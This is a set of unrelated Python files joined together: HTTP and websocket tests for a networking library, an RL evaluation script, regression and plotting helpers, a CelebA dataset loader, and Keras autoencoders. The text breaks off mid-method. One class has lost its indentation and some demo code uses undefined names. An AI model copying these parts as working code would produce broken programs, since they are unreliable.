        response = response.recv()
        assert response.status.code == 200
        h.stop()

    def test_put(self):
        # Server replies with method + body so we can see both round-trip.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                request.reply(
                    vanilla.http.Status(200),
                    {},
                    request.method + request.consume())

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        response = conn.put('/').recv()
        assert response.status.code == 200
        assert response.consume() == 'PUT'

        response = conn.put('/', data='toby').recv()
        assert response.status.code == 200
        assert response.consume() == 'PUTtoby'

        h.stop()

    def test_delete(self):
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                request.reply(vanilla.http.Status(200), {}, request.method)

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        response = conn.delete('/').recv()
        assert response.status.code == 200
        assert response.consume() == 'DELETE'

        h.stop()

    def test_404(self):
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                request.reply(vanilla.http.Status(404), {}, '')

        uri = 'http://localhost:%s' % serve.port
        response = h.http.connect(uri).get('/').recv()
        assert response.status.code == 404
        h.stop()

    def test_overlap(self):
        # Requests pipelined on one connection are answered in request order,
        # so the slower first request ('/50') completes before '/20'.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                t = request.path[1:]
                h.sleep(int(t))
                request.reply(vanilla.http.Status(200), {}, t)

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        q = h.queue(10)

        def go(t):
            r = conn.get('/' + str(t)).recv()
            q.send(int(r.consume()))

        h.spawn(go, 50)
        h.spawn(go, 20)

        assert q.recv() == 50
        assert q.recv() == 20

        h.stop()

    def test_basic_auth(self):
        # Client auth tuple is sent as an Authorization: Basic header
        # ('Zm9vOmJhcg==' is base64 of 'foo:bar').
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                request.reply(
                    vanilla.http.Status(200),
                    {},
                    request.headers['Authorization'])

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)

        response = conn.get('/', auth=('foo', 'bar'))
        response = response.recv()
        assert response.consume() == 'Basic Zm9vOmJhcg=='

    def test_connection_lost(self):
        # Server hangs up mid-request; the pending recv raises ConnectionLost.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            for request in conn:
                conn.socket.close()

        uri = 'http://localhost:%s' % serve.port
        conn = h.http.connect(uri)
        response = conn.get('/')
        pytest.raises(vanilla.ConnectionLost, response.recv)

        h.stop()

    def test_json(self):
        h = vanilla.Hub()
        serve = h.http.listen()
        uri = 'http://localhost:%s' % serve.port

        response = h.http.get(uri)

        conn = serve.recv()
        request = conn.recv()
        request.reply(vanilla.http.Status(200), {}, json.dumps({'foo': 'bar'}))

        response = response.recv()
        assert response.json() == {'foo': 'bar'}
class TestWebsocket(object):
    """Websocket upgrade, echo framing at various payload sizes, and close."""

    def test_websocket(self):
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            request = conn.recv()
            ws = request.upgrade()
            for item in ws.recver:
                ws.send(item)

        uri = 'ws://localhost:%s' % serve.port
        ws = h.http.connect(uri).websocket('/')

        gc.collect()

        # Payload sizes straddle the websocket length-encoding boundaries
        # (<=125 one-byte length, 126..65535 two-byte, >65535 eight-byte).
        message = 'x' * 125
        ws.send(message)
        assert ws.recv() == message

        message = 'x' * 126
        ws.send(message)
        assert ws.recv() == message

        message = 'x' * 65535
        ws.send(message)
        assert ws.recv() == message

        message = 'x' * 65536
        ws.send(message)
        assert ws.recv() == message

        # test we can call select on the websocket
        message = 'x' * 125
        ws.send(message)
        assert h.select([ws.recver]) == (ws.recver, message)

        h.stop()

    def test_websocket_end(self):
        # Server closes after one message; client recv raises Closed.
        h = vanilla.Hub()

        serve = h.http.listen()

        @h.spawn
        def _():
            conn = serve.recv()
            request = conn.recv()
            ws = request.upgrade()
            ws.recv()
            ws.close()

        uri = 'ws://localhost:%s' % serve.port
        ws = h.http.connect(uri).websocket('/')
        ws.send('1')
        pytest.raises(vanilla.Closed, ws.recv)
        h.stop()
|
<filename>examples/Tester_platoon.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 4 19:01:24 2020
@author: <NAME>
"""
# tester platoon
from asynch_rl.rl.rl_env import Multiprocess_RL_Environment
from asynch_rl.rl.utilities import clear_pycache, load_train_params
import sys
import psutil
import time
import matplotlib.pyplot as plt
import numpy as np
import os
import asyncio
#####
from argparse import ArgumentParser
# Command-line options.  The boolean flags accept any of 'true'/'1'/'yes'
# (case-insensitive) as True; anything else parses as False.
parser = ArgumentParser()
parser.add_argument("-v", "--version", dest="net_version", type=int, default=31, help="training version")
parser.add_argument("-i", "--iter", dest="iteration", type=int, default=-1, help="iteration")
parser.add_argument("-sim", "--simulate", dest="simulate", type=lambda x: (str(x).lower() in ['true', '1', 'yes']), default=True, help="simulate instance")
parser.add_argument("-d", "--difficulty", dest="difficulty", type=int, default=1, help="difficulty")
parser.add_argument("-s", "--save-movie", dest="save_movie", type=lambda x: (str(x).lower() in ['true', '1', 'yes']), default=False, help="save movie")
parser.add_argument("-e", "--eps-format", dest="eps_format", type=lambda x: (str(x).lower() in ['true', '1', 'yes']), default=False, help="eps_format")
args = parser.parse_args()
################
# generate proper discretized bins structure
def main(net_version=100, iteration=2, simulate=False, difficulty=0, save_movie=False, eps_format=False):
    """Load a trained Platoon RL model at the given version/iteration and run
    a rendered evaluation episode.

    NOTE(review): simulate, save_movie and eps_format are accepted but never
    read in this body -- presumably for interface parity with sibling
    testers; confirm before removing.
    """
    # generate proper discretized bins structure
    ################
    env_type = 'Platoon'
    model_type = 'LinearModel'

    # Pull the training-time hyperparameters for this net version so the
    # evaluation environment is built with matching settings.
    overwrite_params = ['layers_width', 'discr_act_bins', 'n_gears', 'rewards', 'rl_mode', 'normalize_layers', 'val_frequency']
    my_dict = load_train_params(env_type, model_type, overwrite_params, net_version)
    local_vars = locals()
    # NOTE(review): writing into locals() does not create real local
    # variables; the values are only reachable through the local_vars dict,
    # which is how they are read below.
    for i, par in enumerate(overwrite_params):
        #exec(par + " = my_dict['" + par + "']", None, )
        local_vars[par] = my_dict[par]
    del(overwrite_params, my_dict)

    import inspect
    inspect.signature(Multiprocess_RL_Environment.__init__)

    env_options = {'n_gears': local_vars['n_gears']}
    #discr_act_bins = local_vars['discr_act_bins']
    #if change_gears:
    #    discr_act_bins.append(1)

    # Single-process (ray_parallelize=False), rendering enabled.
    rl_env = Multiprocess_RL_Environment(env_type, model_type, net_version, rl_mode=local_vars['rl_mode'], ray_parallelize=False, \
        move_to_cuda=False, show_rendering=True, discr_env_bins=local_vars['discr_act_bins'],\
        difficulty=difficulty, layers_width=local_vars['layers_width'], normalize_layers=local_vars['normalize_layers'],\
        rewards=local_vars['rewards'], val_frequency=local_vars['val_frequency'], env_options=env_options)  #, \

    rl_env.save_movie = False
    rl_env.live_plot = False
    # always update agents params after rl_env params are changed
    rl_env.updateAgentsAttributesExcept('env')
    rl_env.load(iteration)
    #rl_env.load(320)

    rl_env.plot_training_log(1)

    #%%
    # Run one evaluation episode with the first discrete sim agent.
    agent = rl_env.sim_agents_discr[0]
    #agent.max_steps_single_run = 5000
    #
    agent.movie_frequency = 1
    agent.tot_iterations = 500
    agent.max_n_single_runs = 1
    agent.env.env.sim_length_max = 200
    sim_log, single_runs, successful_runs, _, _, pg_info = agent.run_synch(use_NN=True, test_qv=False)
    agent.env.env.plot_graphs()
#%%
################################################################
if __name__ == "__main__":
    main(net_version=args.net_version, iteration=args.iteration, simulate=args.simulate, \
         difficulty=args.difficulty, save_movie=args.save_movie, eps_format=args.eps_format)
    # Tidy up compiled bytecode caches under this examples folder afterwards.
    current_folder = os.path.abspath(os.path.dirname(__file__))
    clear_pycache(current_folder)
|
import pickle
from inspect import getsourcelines, getfile
import numpy as np
import statsmodels.api as sm
from matplotlib import pyplot as plt
from modelinter.models.constants import Paths
def returns(a_0, a_1):
    """Simple (linear) return of moving from value a_0 to value a_1."""
    change = a_1 - a_0
    return change / a_0
def inverse_returns(C, r):
    """Invert the linear-returns formula: value of C after a return of r."""
    growth_factor = 1 + r
    return C * growth_factor
def lf(X, Y, missing='drop', zeroc=True, finiteonly=False, **kwargs):
    """lf stands for "linear fit".

    Returns a dictionary with results for the OLS regression Y ~ m*X + q
    (Y is the endog/response, X the exog/predictor -- the original docstring
    had them swapped).  If zeroc=False, q is fixed at 0 (no intercept).
    Keys of the result dict are the lf.* string constants defined below.
    """
    X = np.array(X)
    Y = np.array(Y)
    if finiteonly:
        # Keep only positions where both series are finite (drops NaN/inf).
        keep = np.isfinite(X) & np.isfinite(Y)
        X = X[keep]
        Y = Y[keep]
    # With an intercept, statsmodels orders params as [q, m].
    Xc = sm.add_constant(X) if zeroc else X
    mod = sm.OLS(endog=Y, exog=Xc, missing=missing, **kwargs)
    res = mod.fit()
    result = {lf.r2: res.rsquared,
              lf.m: res.params[1],
              lf.q: res.params[0],
              lf.stderr_m: res.bse[1],
              lf.pval_m: res.pvalues[1],
              lf.stderr_q: res.bse[0],
              lf.pval_q: res.pvalues[0],
              lf.obj: res,
              lf.df: len(X),
              # NOTE(review): mse_resid is the residual mean squared error
              # (a variance), despite the 'stderr y' key name -- confirm.
              lf.stderr_y: res.mse_resid
              } if zeroc else {
              lf.r2: res.rsquared,
              lf.q: np.nan,
              lf.m: res.params[0],
              lf.stderr_m: res.bse[0],
              lf.pval_m: res.pvalues[0],
              lf.stderr_q: np.nan,
              lf.pval_q: np.nan,
              lf.obj: res,
              lf.df: len(X),
              lf.stderr_y: res.mse_resid
              }
    return result
# Result-dict key constants attached to lf itself so callers can index the
# returned dict without magic strings (e.g. result[lf.r2]).
lf.r2 = 'R^2'
lf.m = 'm'
lf.q = 'q'
lf.stderr_m = 'stderr m'
lf.pval_m = 'pval m'
lf.stderr_q = 'stderr q'
lf.pval_q = 'pval q'
lf.obj = 'obj'
lf.df = 'df'
lf.stderr_y = 'stderr y'
def linfitplot(ax, X, Y, zeroc=True, finiteonly=False, **kwargs):
    """Fit Y against X with lf() and draw the fitted line on ax.

    kwargs override the default black line properties; returns the lf()
    result dictionary.
    """
    fit = lf(X, Y, zeroc=zeroc, finiteonly=finiteonly)
    # Defaults first, caller overrides win.
    line_props = dict({'color': 'black'}, **kwargs)
    xs = np.linspace(np.nanmin(X), np.nanmax(X), 3)
    ys = fit['m'] * xs + fit['q'] if zeroc else fit['m'] * xs
    ax.plot(xs, ys, **line_props)
    return fit
class Pkl():
    """Tiny namespace for pickling objects to and from disk.

    Fix: the methods were plain functions without self/@staticmethod, so
    calling them on an *instance* (Pkl().save(obj, path)) mis-bound the
    instance as the first argument.  @staticmethod keeps Pkl.save/Pkl.load
    working unchanged and makes instance calls work too.
    """

    @staticmethod
    def save(obj, filename):
        """Pickle obj to filename (binary mode)."""
        with open(filename, 'wb') as file:
            pickle.dump(obj, file)

    @staticmethod
    def load(filename):
        """Unpickle and return the object stored at filename."""
        with open(filename, 'rb') as file:
            return pickle.load(file)
def countdays(t0, t1):
    """Count business days between two numpy datetimes (t1 exclusive)."""
    # Truncate both timestamps to day resolution before counting.
    day0 = t0.astype('<M8[D]')
    day1 = t1.astype('<M8[D]')
    return np.busday_count(day0, day1)
# First month of each quarter -> quarter label.  Kept for callers that use
# the mapping directly; dateToQuarter no longer needs it.
QUARTER_MAP = {1: 'Q1', 4: 'Q2', 7: 'Q3', 10: 'Q4'}


def dateToQuarter(string):
    """Convert a 'YYYY-MM' date string to 'YYYY-QN' (month -> its quarter).

    Generalized: the original only accepted quarter-start months (1, 4, 7,
    10) and raised KeyError otherwise; any month 1-12 now maps to the
    quarter containing it, with identical output for the original inputs.
    """
    y, m = string.split('-')
    quarter = (int(m) - 1) // 3 + 1
    return '%s-Q%d' % (y, quarter)
def show_figure(fig, nb=False):
    """Display fig; outside notebooks (nb=False), block until the window closes."""
    # pycharm workaround:
    fig.show()
    # problems with tkinter are solved only if
    # you call this method on fig
    # NOTE(review): canvas._master is a private attribute of the TkAgg
    # backend -- this blocking wait only works with that backend; confirm.
    if not nb: fig.canvas._master.wait_window()
def draw_plot(plot_function, function_args, nb=False):
    """Render plot_function on a fresh figure and display it.

    Intended for IDEs and other contexts where plots pop out in a window;
    pass nb=True when drawing inside a notebook.
    """
    figure, axes = plt.subplots()
    plot_function(ax=axes, **function_args)
    figure.tight_layout()
    show_figure(figure, nb=nb)
def save_figure(fig, name):
    """Save fig under the figures directory in three formats:
    low-res PNG, hi-res PNG and PDF."""
    base = Paths.FIGURES_DIR.value + name
    for suffix, dpi in (('.png', 150), ('_hr.png', 600), ('.pdf', 600)):
        fig.savefig(base + suffix, dpi=dpi)
def view_code(obj):
    """Pretty-print the source code of obj (function, class, ...), if any."""
    print("In file: " + getfile(obj) + "\n\n")
    source_lines, _first_lineno = getsourcelines(obj)
    print(''.join(source_lines))
|
import os
import torch
import numpy as np
import scipy.misc as m
import re
import glob
from torch.utils import data
class CELEBA(data.Dataset):
    """CelebA attribute dataset (40 binary face attributes per image).

    NOTE(review): paths are built with literal '\\' separators, so this
    loader is Windows-only as written; the commented-out os.path.join line
    hints at an unfinished portable version.
    """

    def __init__(self, root, split="train", is_transform=False, img_size=(32, 32), augmentations=None):
        """__init__

        :param root: dataset root containing Anno/, Img/ and Eval/ folders
        :param split: one of 'train', 'val', 'test' (matched by substring)
        :param is_transform: apply transform_img() to each image
        :param img_size: target (H, W) or a single int for square resize
        :param augmentations: optional callable applied to the raw image
        """
        self.root = root
        self.split = split
        self.is_transform = is_transform
        self.augmentations = augmentations
        self.n_classes = 40
        self.img_size = img_size if isinstance(img_size, tuple) else (img_size, img_size)
        # Per-channel means used for centring; marked TODO upstream.
        self.mean = np.array([73.15835921, 82.90891754, 72.39239876])  # TODO(compute this mean)
        self.files = {}
        self.labels = {}

        # Attribute annotations: one line per image, '-1'/'1' flags remapped
        # to 0/1.  First two lines of the file are count + header.
        self.label_file = self.root + "\\Anno\\list_attr_celeba.txt"
        label_map = {}
        with open(self.label_file, 'r') as l_file:
            labels = l_file.read().split('\n')[2:-1]
        for label_line in labels:
            f_name = re.sub('jpg', 'png', label_line.split(' ')[0])
            label_txt = list(map(lambda x: int(x), re.sub('-1', '0', label_line).split()[1:]))
            label_map[f_name] = label_txt

        self.all_files = glob.glob(self.root + '\\Img\\img_align_celeba_png\\*.png')
        # self.all_files = glob.glob(os.path.join(self.root, 'Img', 'img_align_celeba_png') + '*.png')

        # Official train/val/test partition: second column is 0/1/2.
        with open(root + '\\Eval\\list_eval_partition.txt', 'r') as f:
            fl = f.read().split('\n')
            fl.pop()
            if 'train' in self.split:
                selected_files = list(filter(lambda x: x.split(' ')[1] == '0', fl))
            elif 'val' in self.split:
                selected_files = list(filter(lambda x: x.split(' ')[1] == '1', fl))
            elif 'test' in self.split:
                selected_files = list(filter(lambda x: x.split(' ')[1] == '2', fl))
            selected_file_names = list(map(lambda x: re.sub('jpg', 'png', x.split(' ')[0]), selected_files))

        base_path = '\\'.join(self.all_files[0].split('\\')[:-1])
        # NOTE(review): files and labels are built from two separately
        # constructed (but equal) sets; their list order only matches because
        # equal CPython sets happen to iterate identically -- fragile; verify.
        self.files[self.split] = list(map(lambda x: '\\'.join([base_path, x]), set(map(lambda x: x.split('\\')[-1], self.all_files)).intersection(set(selected_file_names))))
        self.labels[self.split] = list(map(lambda x: label_map[x], set(map(lambda x: x.split('\\')[-1], self.all_files)).intersection(set(selected_file_names))))
        self.class_names = ['5_o_Clock_Shadow', 'Arched_Eyebrows', 'Attractive', 'Bags_Under_Eyes', 'Bald', 'Bangs',
                            'Big_Lips', 'Big_Nose', 'Black_Hair', 'Blond_Hair', 'Blurry', 'Brown_Hair', 'Bushy_Eyebrows',
                            'Chubby', 'Double_Chin', 'Eyeglasses', 'Goatee', 'Gray_Hair', 'Heavy_Makeup', 'High_Cheekbones',
                            'Male', 'Mouth_Slightly_Open', 'Mustache', 'Narrow_Eyes', 'No_Beard', 'Oval_Face', 'Pale_Skin',
                            'Pointy_Nose', 'Receding_Hairline', 'Rosy_Cheeks', 'Sideburns', 'Smiling', 'Straight_Hair', 'Wavy_Hair',
                            'Wearing_Earrings', 'Wearing_Hat', 'Wearing_Lipstick', 'Wearing_Necklace', 'Wearing_Necktie', 'Young']

        if len(self.files[self.split]) < 2:
            raise Exception("No files for split=[%s] found in %s" % (self.split, self.root))

        print("Found %d %s images" % (len(self.files[self.split]), self.split))

    def __len__(self):
        """Number of images in the selected split."""
        return len(self.files[self.split])

    def __getitem__(self, index):
        """Return [img] + the 40 attribute flags for the image at index.

        NOTE(review): the return value is a flat 41-element list, not an
        (img, label) pair -- confirm downstream collation expects this.
        """
        img_path = self.files[self.split][index].rstrip()
        label = self.labels[self.split][index]
        # NOTE(review): scipy.misc.imread/imresize were removed in scipy>=1.2;
        # this requires an old scipy (with PIL) -- confirm pinned versions.
        img = m.imread(img_path)

        if self.augmentations is not None:
            img = self.augmentations(np.array(img, dtype=np.uint8))

        if self.is_transform:
            img = self.transform_img(img)

        return [img] + label

    def transform_img(self, img):
        """transform

        Mean subtraction, remap to [0, 1], channel order transpose to make
        Torch happy.
        """
        # RGB -> BGR channel flip before subtracting the (BGR-ordered?) mean
        # -- ordering assumption not verifiable from here.
        img = img[:, :, ::-1]
        img = img.astype(np.float64)
        img -= self.mean
        img = m.imresize(img, (self.img_size[0], self.img_size[1]))
        # Resize scales images from 0 to 255, thus we need
        # to divide by 255.0
        img = img.astype(float) / 255.0
        # HWC -> CHW (channels first for torch)
        img = img.transpose(2, 0, 1)
        img = torch.from_numpy(img).float()
        return img
if __name__ == '__main__':
    # Visual smoke test: iterate batches and display them until 'ex' is typed.
    import torchvision
    import matplotlib.pyplot as plt
    local_path = r'X:\Shared datasets\CELEBA'
    dst = CELEBA(local_path, is_transform=True, augmentations=None)
    bs = 4
    trainloader = data.DataLoader(dst, batch_size=bs, num_workers=0)
    # NOTE(review): the loop variable `data` shadows the torch.utils.data
    # module imported at the top of the file.
    for i, data in enumerate(trainloader):
        imgs = data[0]
        imgs = imgs.numpy()[:, ::-1, :, :]
        imgs = np.transpose(imgs, [0, 2, 3, 1])
        f, axarr = plt.subplots(bs, 4)
        for j in range(bs):
            axarr[j][0].imshow(imgs[j])
            # NOTE(review): `labels` and `instances` are undefined here and
            # CELEBA defines no decode_segmap(); these three lines look
            # copied from a segmentation dataset demo and will raise
            # NameError/AttributeError if executed.
            axarr[j][1].imshow(dst.decode_segmap(labels.numpy()[j]))
            axarr[j][2].imshow(instances[j, 0, :, :])
            axarr[j][3].imshow(instances[j, 1, :, :])
        plt.show()
        # NOTE(review): raw_input is Python 2; under Python 3 use input().
        a = raw_input()
        if a == 'ex':
            break
        else:
            plt.close()
|
import pickle # remove after getting final version of code
import os
import numpy as np
from keras.utils import np_utils
from keras.layers import (
    Input,
    Conv2D,
    Conv3D,
    Flatten,
    Dense,
    Dropout,
    Reshape,
    BatchNormalization,
    Concatenate,
    MaxPooling2D,
    UpSampling2D,
    UpSampling3D
)
from keras.models import Model, load_model
from keras.optimizers import Adam, RMSprop
from keras.callbacks import ModelCheckpoint
class ExperimentalHSNAutoEncoder:
"""
Convolutional layers on the encoder part were inspired on the
HybridSpectralNet architecture.
"""
def __init__(self, window_shape, filepath='best_model.hdf5'):
self._decoder(self._encoder((25,25,10)))
self.model = Model(inputs=self.input_layer, outputs=self.decoder_output)
self.model.compile(loss='mean_squared_error', optimizer=RMSprop())#, metrics=['accuracy'])
self.model.summary()
abspath = os.path.abspath('.')
self.filepath = os.path.abspath(os.path.join(abspath,filepath))
checkpoint = ModelCheckpoint(self.filepath, monitor='accuracy', verbose=1, save_best_only=True, mode='max')
self.callbacks_list = [checkpoint]
def _encoder(self, window_shape):
"""input_shape: (height, width, num_bands)"""
self.height, self.width, self.num_bands = window_shape
## input layer
self.input_layer = Input(
(
self.height,
self.width,
self.num_bands,
1
)
)
########################################################################
# convolutional layers
########################################################################
conv_layer1 = Conv3D(filters=8, kernel_size=(3, 3, 2), activation='relu')(self.input_layer) # 23, 23, 9, 8
conv_layer2 = Conv3D(filters=16, kernel_size=(3, 3, 5), activation='relu')(conv_layer1) # 21, 21, 5, 16
conv_layer3 = Conv3D(filters=32, kernel_size=(3, 3, 3), activation='relu')(conv_layer2) # 19, 19, 3, 32
conv3d_shape = conv_layer3._keras_shape
conv_layer3 = Reshape((conv3d_shape[1],conv3d_shape[2],conv3d_shape[3]*conv3d_shape[4]))(conv_layer3) # 19, 19, 96
conv2 = Conv2D(
filters=64,
kernel_size=(4,4),
activation='relu'
)(conv_layer3) # 16 x 16 x 64
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv2)
conv2 = BatchNormalization()(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2) #8 x 8 x 64
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same')(pool2) #8 x 8 x 128 (small and thick)
conv3 = BatchNormalization()(conv3)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv3)
conv3 = BatchNormalization()(conv3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv3) #8 x 8 x 256 (small and thick)
conv4 = BatchNormalization()(conv4)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same')(conv4)
self.encoder_output = BatchNormalization()(conv4)
return self.encoder_output
def _decoder(self, encoder_output):
"""
"""
conv5 = Conv2D(128, (3, 3), activation='relu', padding='same')(encoder_output) #8 x 8 x 128
conv5 = BatchNormalization()(conv5)
conv5 = Conv2D(128, (3, 3), activation='relu', padding='same')(conv5)
conv5 = BatchNormalization()(conv5)
conv6 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv5) #8 x 8 x 64
conv6 = BatchNormalization()(conv6)
conv6 = Conv2D(64, (3, 3), activation='relu', padding='same')(conv6)
conv6 = BatchNormalization()(conv6)
up1 = UpSampling2D((3,3))(conv6) # 24 x 24 x 64
conv7 = Conv2D(96, (6, 6), activation='relu')(up1) # 19 x 19 x 96
conv7 = BatchNormalization()(conv7)
conv7 = Conv2D(96, (6, 6), activation='relu', padding='same')(conv7)
conv7 = BatchNormalization()(conv7)
up2 = UpSampling2D((2,2))(conv7)
up2shp = up2._keras_shape
conv7 = Reshape((up2shp[1], up2shp[2], 3, int(up2shp[3]/3)))(up2) # 38, 38, 3, 32
conv8 = Conv3D(16, kernel_size=(18,18,1), activation='relu')(conv7)
conv8 = BatchNormalization()(conv8)
conv8 = Conv3D(16, kernel_size=(18,18,1), activation='relu', padding='same')(conv8)
conv8 = BatchNormalization()(conv8)
up3 = UpSampling3D((2,2,4))(conv8)
conv9 = Conv3D(8, kernel_size=(18,18,3), activation='relu')(up3)
conv9 = BatchNormalization()(conv9)
conv9 = Conv3D(8, kernel_size=(3,3,3), activation='relu', padding='same')(conv9)
conv9 = BatchNormalization()(conv9)
conv10 = Conv3D(1, kernel_size=(3,3,2), activation='relu', padding='same')(conv9)
self.decoder_output = BatchNormalization()(conv10)
return self.decoder_output
def load_weights(self, filepath):
    """Load a saved model from *filepath*, remember the path, and
    recompile with MSE loss / RMSprop (the constructor's configuration)."""
    restored = load_model(filepath)
    restored.compile(loss='mean_squared_error', optimizer=RMSprop())
    self.filepath = filepath
    self.model = restored
def fit(self, X, y, batch_size=256, epochs=100):
    """Train the model on image cubes.

    Both X and y are reshaped to (samples, height, width, bands, 1);
    the band count is taken from the last axis of X and cached on the
    instance. The Keras history object is stored on ``self.history``.
    """
    self.num_bands = X.shape[-1]
    target_shape = (-1, self.height, self.width, self.num_bands, 1)
    X = X.reshape(target_shape)
    y = y.reshape(target_shape)
    self.history = self.model.fit(x=X, y=y,
                                  batch_size=batch_size,
                                  epochs=epochs,
                                  callbacks=self.callbacks_list)
def predict(self, X, filepath=None):
    """Run the model on *X*, optionally reloading weights from *filepath*
    first; X is reshaped to (samples, height, width, bands, 1)."""
    # assert: self.filepath or filepath must exist
    if filepath:
        self.load_weights(filepath)
        self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
    self.num_bands = X.shape[-1]
    X = X.reshape(
        -1,
        self.height,
        self.width,
        self.num_bands,
        1
    )
    # NOTE(review): argmax over axis 1 looks copied from a classifier's
    # predict(); for an autoencoder the raw reconstruction (or its error)
    # is usually wanted -- confirm this is intentional.
    y_pred = np.argmax(self.model.predict(X), axis=1)
    return y_pred
class MLPAutoEncoder:
    """Fully-connected (per-pixel) spectral autoencoder.

    Compresses a ``num_bands``-dimensional input to a 4-unit bottleneck
    and reconstructs it; the per-sample reconstruction MSE returned by
    :meth:`predict` can be used as an anomaly score.
    """

    def __init__(self, num_bands, filepath='best_model.hdf5'):
        self.num_bands = num_bands
        self._decoder(self._encoder(num_bands))
        self.model = Model(inputs=self.input_layer, outputs=self.decoder_output)
        self.model.compile(loss='mean_squared_error', optimizer=RMSprop())#, metrics=['accuracy'])
        self.model.summary()
        # Checkpoint the lowest-loss weights, resolved relative to the CWD.
        abspath = os.path.abspath('.')
        self.filepath = os.path.abspath(os.path.join(abspath, filepath))
        checkpoint = ModelCheckpoint(self.filepath, monitor='loss', verbose=1, save_best_only=True, mode='min')
        self.callbacks_list = [checkpoint]

    def _encoder(self, num_bands):
        """Build the encoder MLP: num_bands -> 32 -> 16 -> 4."""
        self.input_layer = Input((num_bands,))
        layer1 = Dense(32, input_shape=self.input_layer._keras_shape, activation='relu')(self.input_layer)
        layer1 = BatchNormalization()(layer1)
        layer2 = Dense(16, activation='relu')(layer1)
        layer2 = BatchNormalization()(layer2)
        layer3 = Dense(4, activation='relu')(layer2)
        self.encoder_output = BatchNormalization()(layer3)
        return self.encoder_output

    def _decoder(self, encoder_output):
        """Build the decoder MLP: 4 -> 16 -> 32 -> num_bands (linear output)."""
        layer4 = Dense(16, input_shape=self.encoder_output._keras_shape, activation='relu')(encoder_output)
        layer4 = BatchNormalization()(layer4)
        layer5 = Dense(32, activation='relu')(layer4)
        layer5 = BatchNormalization()(layer5)
        # BUG FIX: the output width was hard-coded to 10 units; it must be
        # num_bands so the reconstruction aligns with the input -- predict()
        # computes (X_pred - X) ** 2, which fails whenever num_bands != 10.
        self.decoder_output = Dense(self.num_bands, activation=None)(layer5)
        return self.decoder_output

    def load_weights(self, filepath):
        """Reload a checkpointed model from *filepath* and recompile it."""
        self.filepath = filepath
        self.model = load_model(filepath)
        self.model.compile(loss='mean_squared_error', optimizer=RMSprop())

    def fit(self, X, y, batch_size=256, epochs=100):
        """Train on flattened spectra; X and y are reshaped to (-1, num_bands)."""
        # transform matrices to correct format
        self.num_bands = X.shape[-1]
        X = X.reshape(-1, self.num_bands,)
        y = y.reshape(-1, self.num_bands,)
        self.history = self.model.fit(
            x=X,
            y=y,
            batch_size=batch_size,
            epochs=epochs,
            callbacks=self.callbacks_list
        )

    def predict(self, X, filepath=None):
        """Return the per-sample reconstruction MSE for *X*.

        If *filepath* is given, weights are reloaded from it first;
        otherwise the model must already hold trained weights.
        """
        if filepath:
            self.load_weights(filepath)
            self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
        X_pred = self.model.predict(X)
        mse = ((X_pred - X) ** 2).mean(axis=1)
        return mse
class MLPEncoderClassifier:
    """Classifier head stacked on one or more pre-built MLP encoders.

    The encoders' outputs are concatenated and fed into a small MLP
    that predicts ``num_targets`` classes.
    """

    def __init__(self, encoder_list, num_targets, filepath='best_model.hdf5'):
        self.num_targets = num_targets
        self.num_encoders = len(encoder_list)
        MergedEncoders = Concatenate()([model.encoder_output for model in encoder_list])
        self._MLPClassifier(MergedEncoders)
        self.model = Model(inputs=[model.input_layer for model in encoder_list], outputs=self.output_layer)
        self.adam = Adam(lr=0.001, decay=1e-06)
        self.model.compile(loss='categorical_crossentropy', optimizer=self.adam, metrics=['accuracy'])
        self.model.summary()
        # Checkpoint the highest-accuracy weights, resolved relative to the CWD.
        abspath = os.path.abspath('.')
        self.filepath = os.path.abspath(os.path.join(abspath, filepath))
        checkpoint = ModelCheckpoint(self.filepath, monitor='accuracy', verbose=1, save_best_only=True, mode='max')
        self.callbacks_list = [checkpoint]

    def _MLPClassifier(self, merged_encoders_outputs):
        """Build the classification head over the merged encoder outputs."""
        layer1 = BatchNormalization()(merged_encoders_outputs)
        layer1 = Dense(32, activation='relu')(layer1)
        layer1 = BatchNormalization()(layer1)
        layer2 = Dense(16, activation='relu')(layer1)
        layer2 = BatchNormalization()(layer2)
        # NOTE(review): sigmoid + categorical_crossentropy is unusual for
        # single-label classification (softmax is standard) -- kept as-is.
        self.output_layer = Dense(self.num_targets, activation='sigmoid')(layer2)
        return self.output_layer

    def load_weights(self, filepath):
        """Reload a checkpointed model from *filepath*.

        BUG FIX: predict() called self.load_weights(), but this class never
        defined the method, so passing a filepath raised AttributeError.
        load_model restores the compiled state saved with the checkpoint.
        """
        self.filepath = filepath
        self.model = load_model(filepath)

    def fit(self, X, y, batch_size=256, epochs=100):
        """Train the classifier; the same X is fed to every encoder input."""
        # transform matrices to correct format
        self.num_bands = X.shape[-1]
        X = X.reshape(-1, self.num_bands,)
        y = np_utils.to_categorical(y, num_classes=self.num_targets)
        self.history = self.model.fit(
            x=[X for i in range(self.num_encoders)],
            y=y,
            batch_size=batch_size,
            epochs=epochs,
            callbacks=self.callbacks_list
        )

    def predict(self, X, filepath=None):
        """Return predicted class indices for *X* (argmax over the head)."""
        if filepath:
            self.load_weights(filepath)
            # NOTE(review): recompiling with MSE mirrors the sibling classes
